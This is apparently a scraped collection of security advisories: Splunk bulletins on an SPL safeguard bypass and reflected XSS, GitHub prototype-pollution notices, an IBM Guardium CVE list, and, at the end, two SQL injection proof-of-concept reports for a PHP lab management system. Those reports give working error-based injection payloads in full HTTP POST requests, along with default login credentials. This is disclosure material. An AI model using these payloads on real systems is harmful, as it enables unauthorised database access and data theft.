In Splunk Enterprise versions below 8.2.9 and 8.1.12, the way that the ‘tstats command handles Javascript Object Notation (JSON) lets an attacker bypass SPL safeguards for risky commands https://docs.splunk.com/Documentation/SplunkCloud/latest/Security/SPLsafeguards . The vulnerability requires the attacker to phish the victim by tricking them into initiating a request within their browser.

**Advisory ID:** SVD-2022-1105

**Published:** 2022-11-02

**CVSSv3.1 Score:** 8.1, High

**CWE:** CWE-20

**CVE ID:** CVE-2022-43565

**Last Update:** 2022-11-02

**CVSSv3.1 Vector:** CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N

**Bug ID:** SPL-224121

**Description**

In Splunk Enterprise versions below 8.2.9 and 8.1.12, the way that the ‘tstats’ command handles Javascript Object Notation (JSON) lets an attacker bypass SPL safeguards for risky commands. The vulnerability requires the attacker to phish the victim by tricking them into initiating a request within their browser.   

**Solution**

For Splunk Enterprise, upgrade versions to 8.1.12, 8.2.9, or higher.  

For Splunk Cloud Platform versions below 9.0.2203, Splunk is actively patching and monitoring the Splunk Cloud instances. To request an immediate upgrade, determine which version of Splunk Cloud Platform you're running, then create a new support case.

**Product Status**

Product

Version

Component

Affected Version

Fixed Version

Splunk Enterprise

8.1

Search

8.1.11 and lower

8.1.12

Splunk Enterprise

8.2

Search

8.2.0 to 8.2.8

8.2.9

Splunk Enterprise

9.0

Search

Not Affected

\-

Splunk Cloud Platform

\-

Search

9.0.2202 and lower

9.0.2203

**Mitigations and Workarounds**

The vulnerability affects instances with Splunk Web enabled; disabling Splunk Web is a possible workaround. See Disable unnecessary Splunk Enterprise components and the web.conf configuration specification file for more information on disabling Splunk Web.  

**Detections**

None

**Severity **

Splunk rates the vulnerability as High, 8.1, with a CVSS Vectors of CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N.

The vulnerability requires a user interaction within a browser of a privileged user. The vulnerability lets an attacker run risky commands with permissions of a highly privileged user. For more information on risky commands and potential impacts, see SPL safeguards for risky commands. 

If the Splunk Enterprise instance does not run Splunk Web, there is no impact and the severity is Informational.  

Questions? Submit your question to Splunk Support.

CVE-2022-43565: SVD-2022-1105 | Splunk

In Splunk Enterprise versions below 8.1.12, 8.2.9, and 9.0.2, a View allows for a Reflected Cross Site Scripting via JavaScript Object Notation (JSON) in a query parameter when output_mode=radio.

**Advisory ID:** SVD-2022-1108

**Published:** 2022-11-02

**CVSSv3.1 Score:** 8.8, High

**CWE:** CWE-79

**CVE ID:** CVE-2022-43568

**Last Update:** 2022-11-02

**CVSSv3.1 Vector:** CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

**Bug ID:** SPL-228379

**Description**

In Splunk Enterprise versions below 8.1.12, 8.2.9, and 9.0.2, a View allows for a Reflected Cross Site Scripting via JavaScript Object Notation (JSON) in a query parameter when output\_mode=radio.  

**Solution**

For Splunk Enterprise, upgrade versions to 8.1.12, 8.2.9, 9.0.2, or higher.  

For Splunk Cloud Platform versions below 9.0.2205, Splunk is actively patching and monitoring the Splunk Cloud instances. To request an immediate upgrade, determine which version of Splunk Cloud Platform you're running, then create a new support case.

**Product Status**

Product

Version

Component

Affected Version

Fixed Version

Splunk Enterprise

8.1

Splunk Web

8.1.11 and lower

8.1.12

Splunk Enterprise

8.2

Splunk Web  

8.2.0 to 8.2.8

8.2.9

Splunk Enterprise

9.0

Splunk Web  

9.0.0 to 9.0.1

9.0.2

Splunk Cloud Platform

\-

Splunk Web  

9.0.2203.4 and lower

9.0.2205

**Mitigations and Workarounds**

The vulnerability affects instances with Splunk Web enabled, disabling Splunk Web is a possible workaround. See Disable unnecessary Splunk Enterprise components and the web.conf configuration specification file for more information on disabling Splunk Web.  

**Detections**

**Splunk Reflected XSS in the templates lists radio**  

Splunk versions 8.1.0, 8.2.0, and 9.0.0 are vulnerable to reflected cross site scripting (XSS) exploitation leading to Local File Inclusion (LFI) in the Splunk Assist application. This detection search provides information on exploitation attempts.  

**Severity **

Splunk rates the vulnerability as High, 8.8, with a CVSS Vectors of CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H. The vulnerability requires user interaction within a browser. If the Splunk Enterprise instance does not run Splunk Web, there is no impact and the severity is Informational.  

**Acknowledgments**

Danylo Dmytriiev (DDV\_UA)

CVE-2022-43568: SVD-2022-1108 | Splunk

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Oct. 28 and Nov. 4. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key

Threat Roundup for October 28 to November 4

WebKit suffers from an HTMLSelectElement use-after-free vulnerability.

WebKit HTMLSelectElement Use-After-Free

deep-parse-json version 1.0.2 allows an external attacker to edit or add new properties to an object. This is possible because the application does not correctly validate the incoming JSON keys, thus allowing the `__proto__` property to be edited.

**deep-parse-json vulnerable to Prototype Pollution**

Moderate severity GitHub Reviewed Published Nov 4, 2022 • Updated Nov 8, 2022

GHSA-ff9j-pwxg-q5p2: deep-parse-json vulnerable to Prototype Pollution

fastest-json-copy version 1.0.1 allows an external attacker to edit or add new properties to an object. This is possible because the application does not correctly validate the incoming JSON keys, thus allowing the `__proto__` property to be edited.

**fastest-json-copy vulnerable to Prototype Pollution**

Moderate severity GitHub Reviewed Published Nov 4, 2022 • Updated Nov 8, 2022

GHSA-p5g9-rjcf-95vj: fastest-json-copy vulnerable to Prototype Pollution

deep-object-diff version 1.1.0 allows an external attacker to edit or add new properties to an object. This is possible because the application does not properly validate incoming JSON keys, thus allowing the `__proto__` property to be edited.

**deep-object-diff vulnerable to Prototype Pollution**

Moderate severity GitHub Reviewed Published Nov 4, 2022 • Updated Nov 8, 2022

GHSA-653v-rqx9-j85p: deep-object-diff vulnerable to Prototype Pollution

"IBM Security Guardium 10.5, 10.6, 11.0, 11.1, 11.2, 11.3, and 11.4 stores user credentials in plain clear text which can be read by a local privileged user. IBM X-Force ID: 215587."

  

**Summary**

IBM Security Guardium has fixed these vulnerabilities.

**Vulnerability Details**

**CVEID:**   CVE-2021-39077  
**DESCRIPTION:**   IBM Security Guardium stores user credentials in plain clear text which can be read by a local privileged user.  
CVSS Base score: 4.4  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/215587 for the current score.  
CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N)

**CVEID:**   CVE-2019-12406  
**DESCRIPTION:**   Apache CXF is vulnerable to a denial of service, caused by the failure to restrict the number of message attachments present in a given message. By sending a specially-crafted message containing an overly large number of message attachments, a remote attacker could exploit this vulnerability to cause a denial of service condition.  
CVSS Base score: 5.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/170974 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)

**CVEID:**   CVE-2019-12423  
**DESCRIPTION:**   Apache CXF could allow a remote attacker to obtain sensitive information, caused by a flaw when ships with OpenId Connect JWK Keys service. By accessing the JWK keystore file, an attacker could exploit this vulnerability to obtain the public keys in JWK format, and use this information to launch further attacks against the affected system.  
CVSS Base score: 7.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/174688 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)

**CVEID:**   CVE-2020-13954  
**DESCRIPTION:**   Apache CXF is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by the services listing page. A remote attacker could exploit this vulnerability using the styleSheetPath in a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials.  
CVSS Base score: 6.1  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/191650 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)

**CVEID:**   CVE-2020-1954  
**DESCRIPTION:**   Apache CXF is vulnerable to a man-in-the-middle attack, caused by a flaw in JMX Integration. An attacker could exploit this vulnerability to launch a man-in-the-middle attack and gain access to the communication channel between endpoints to obtain sensitive information or further compromise the system.  
CVSS Base score: 5.9  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/178938 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N)

**CVEID:**   CVE-2021-22696  
**DESCRIPTION:**   Apache CXF is vulnerable to a denial of service, caused by improper validation of request\_uri parameter by the OAuth 2 authorization service. By sending a specially-crafted request, a remote attacker could exploit this vulnerability to cause a denial of service condition on the authorization server.  
CVSS Base score: 7.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/199335 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

**CVEID:**   CVE-2021-30468  
**DESCRIPTION:**   Apache CXF is vulnerable to a denial of service, caused by an infinite loop flaw in the JsonMapObjectReaderWriter function. By sending a specially-crafted JSON to a web service, a remote attacker could exploit this vulnerability to consume available CPU resources.  
CVSS Base score: 7.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/203830 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

**CVEID:**   CVE-2016-4658  
**DESCRIPTION:**   The libxml2 library, as used in multiple products, could allow a remote attacker to execute arbitrary code on the system, caused by a memory corruption error. An attacker could exploit this vulnerability using a specially crafted XML document to execute arbitrary code on the system or cause a denial of service.  
CVSS Base score: 9.8  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/117175 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

**CVEID:**   CVE-2019-11756  
**DESCRIPTION:**   Mozilla Firefox could allow a remote attacker to execute arbitrary code on the system, caused by a use-after-free of SFTKSession object. By persuading a victim to visit a specially-crafted Web site, a remote attacker could exploit this vulnerability using unknown attack vectors to execute arbitrary code on the vulnerable system or cause a denial of service.  
CVSS Base score: 8.8  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/172454 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H)

**CVEID:**   CVE-2019-17006  
**DESCRIPTION:**   Mozilla Network Security Services (NSS), as used in Mozilla Firefox is vulnerable to a heap-based buffer overflow, caused by improper bounds checking when using certain cryptographic primitives. By sending an overly long argument, a remote attacker could overflow a buffer and execute arbitrary code on the system or cause a denial of service.  
CVSS Base score: 8.1  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/174125 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)

**CVEID:**   CVE-2020-6829  
**DESCRIPTION:**   Mozilla Network Security Services (NSS), as used in Mozilla Firefox could allow a local authenticated attacker to obtain sensitive information, caused by a side-channel attack when ECDSA signatures are generated. An attacker could exploit this vulnerability to extract the position of zero and non-zero wNAF digits while nss-certutil tool performs scalar multiplication and obtain the private key.  
CVSS Base score: 4.4  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/186706 for the current score.  
CVSS Vector: (CVSS:3.0/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:N/A:N)

**CVEID:**   CVE-2019-11719  
**DESCRIPTION:**   Mozilla Firefox could allow a remote attacker to obtain sensitive information, caused by an out-of-bounds read when importing a curve25519 private key in PKCS#8format. By persuading a victim to visit a specially-crafted Web site, a remote attacker could exploit this vulnerability using unknown attack vectors to obtain sensitive information.  
CVSS Base score: 6.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/163512 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N)

**CVEID:**   CVE-2017-12624  
**DESCRIPTION:**   Apache CXF is vulnerable to a denial of service. By using a specially crafted message attachment header, a remote attacker could exploit this vulnerability to cause the AX-WS and JAX-RS services stop responding.  
CVSS Base score: 5.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/135095 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)

**CVEID:**   CVE-2018-8039  
**DESCRIPTION:**   Apache CXF could allow a remote attacker to conduct a man-in-the-middle attack. The TLS hostname verification does not work correctly with com.sun.net.ssl interface. An attacker could exploit this vulnerability to launch a man-in-the-middle attack.  
CVSS Base score: 7.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/145516 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N)

**Affected Products and Versions**

**Affected Product(s)**

**Version(s)**

IBM Security Guardium

10.5

IBM Security Guardium

10.6

IBM Security Guardium

11.0

IBM Security Guardium

11.1

IBM Security Guardium

11.2

IBM Security Guardium

11.3

IBM Security Guardium

11.4

  

**Workarounds and Mitigations**

None

**References**

Off

**Acknowledgement**

John Zuccato, Rodney Ryan, Chris Shepherd, Nathan Roane, Vince Dragnea, Troy Fisher, Gabor Minyo, Geoffrey Owden, and Ben Goodspeed from the IBM X-Force Ethical Hacking Team., John Zuccato, Rodney Ryan, Chris Shepherd, Nathan Roane, Vince Dragnea, Tr

**Change History**

18 Apr 2022: Initial Publication  
11 May 2022: Second Publication  
27 May 2022: Third Publication  
22 Sep 2022: Fourth Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSMPHH","label":"IBM Security Guardium"},"Component":"","Platform":\[{"code":"PF016","label":"Linux"}\],"Version":"10.5, 10.6, 11.0, 11.1, 11.2, 11.3, 11.4","Edition":"","Line of Business":{"code":"LOB24","label":"Security Software"}}\]

CVE-2021-39077: IBM Security Guardium is affected by multiple vulnerabilities

Online Diagnostic Lab Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /classes/Master.php?f=delete_appointment.

**Online Diagnostic Lab Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: YorkLee

Login account: admin/admin123 (Super Admin account)

Login account: cblake@sample.com/cblake123 (General account)

vendors: https://www.sourcecodester.com/php/15129/online-diagnostic-lab-management-system-php-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /odlms/classes/Master.php?f=delete\_appointment

Vulnerability location: /odlms/classes/Master.php?f=delete\_appointment,id

dbname=odlms\_db,length=8

\[+\] Payload: id=4' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /odlms/classes/Master.php?f\=delete\_appointment HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.88/odlms/admin/?page=appointments
Content-Length: 66
Cookie: PHPSESSID=5g4g4dffu1bkrg9jm7nr42ori2
Connection: close
id=4'  and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-43062: Cve_report/SQLi-1.md at main · YorkLee53645349/Cve_report

Online Diagnostic Lab Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /classes/Users.php?f=delete_client.

**Online Diagnostic Lab Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: YorkLee

Login account: admin/admin123 (Super Admin account)

Login account: cblake@sample.com/cblake123 (General account)

vendors: https://www.sourcecodester.com/php/15129/online-diagnostic-lab-management-system-php-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /odlms/classes/Users.php?f=delete\_client

Vulnerability location: /odlms/classes/Users.php?f=delete\_client,id

dbname=odlms\_db,length=8

\[+\] Payload: id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /odlms/classes/Users.php?f\=delete\_client HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.88/odlms/admin/?page=appointments
Content-Length: 66
Cookie: PHPSESSID=5g4g4dffu1bkrg9jm7nr42ori2
Connection: close
id=1'  and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

Tag

#js